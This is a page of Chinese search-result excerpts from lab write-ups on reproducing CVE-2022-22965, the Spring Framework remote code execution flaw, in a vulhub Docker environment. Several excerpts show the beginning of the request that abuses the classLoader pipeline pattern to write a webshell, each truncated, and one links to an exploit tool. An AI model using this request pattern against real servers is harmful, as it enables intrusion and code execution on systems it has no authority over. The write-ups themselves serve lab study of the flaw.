漏洞复现-CVE-2022-22965-Spring Framework RCE 0x00 实验环境 攻击机:Ubuntu 靶场:vulhub搭建的靶场环境 0x01 影响版本 Spring Framework < 5.3.18 Spring Framework < 5.2.20 JDK版本:JDK>=9 部署方式:war包部署在TOMCAT中(不是全新的新洞,而是CVE-2010-
当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2. 漏洞复现 目前可以借助vulhub一键复现该漏洞: 代码语言:javascript 代码运行次数:0 运行 AI代码解释 https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965 在当前目录下使用命令:docker-compose up -d即可一键...
漏洞复现 靶机:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965 docker run -p 8080:8080 -d vulhub/spring-webmvc:5.3.17 构造参数 构造请求写入shell 代码语言:javascript 代码运行次数:0 运行 AI代码解释 http://192.168.44.131:8080/?class.module.classLoader.resources.context.parent...
Spring 自带BeanWrapperlmpl,对Spring 容器中的管理对象,,自动调用get/set的方法 漏洞复现 本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场 进入靶场环境,使用以下命令启动环境: docker-compose up -d 检测环境端口是否开放 docker-compose ps 根据VULHUB靶场提示操作,访问靶场服务器IP+端口: http://192.168.0.112...
(https://github.com/vulhub/vulhub) 2、进入vulhub/spring/CVE-2022-22965环境 3、启动docker环境 4、访问系统 0x06 漏洞复现: 1、构造payload: url 拼接: http://192.168.18.130:8080 /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(reque...
三、漏洞复现 漏洞环境:vulhub集成环境 操作系统:KALI Github:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965 启动环境docker-compose up -d docker ps//查看进程 本地浏览器访问,出现如下界面,服务搭建成功! 漏洞Exp ?class.module.classLoader.resources.context.parent.pipeline.first.pattern...
漏洞复现 靶场项目:https://github.com/vulhub/vulhub 1、ubuntu安装docker 源:https://lug.ustc.edu.cn/wiki/mirrors/help/docker/ 2、安装pip 3、安装docker-compose 4、启动靶场环境 可能遇到的问题:卡在了pulling阶段 因为docker加速器超时导致pull不下来,改成国内镜像 ...
漏洞复现 本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场 进入靶场环境,使用以下命令启动环境: docker-compose up -d 1. 检测环境端口是否开放 docker-compose ps 1. 根据VULHUB靶场提示操作,访问靶场服务器IP+端口: http://192.168.0.112:8080/?name=Bob&age=25 ...
vulhub-spring(CVE-2022-22965) 木樨 2023-01-30 21:21:57 26137 所属地 甘肃省1、工具下载 github上一位大佬写的 https://github.com/zangcc/CVE-2022-22965-rexbb 2、手动复现 2.1攻击报文 GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j...
该CVE-2022-22965是在Java 9的环境下,引入了class.module.classLoader,导致了CVE-2010-1622漏洞补丁的绕过。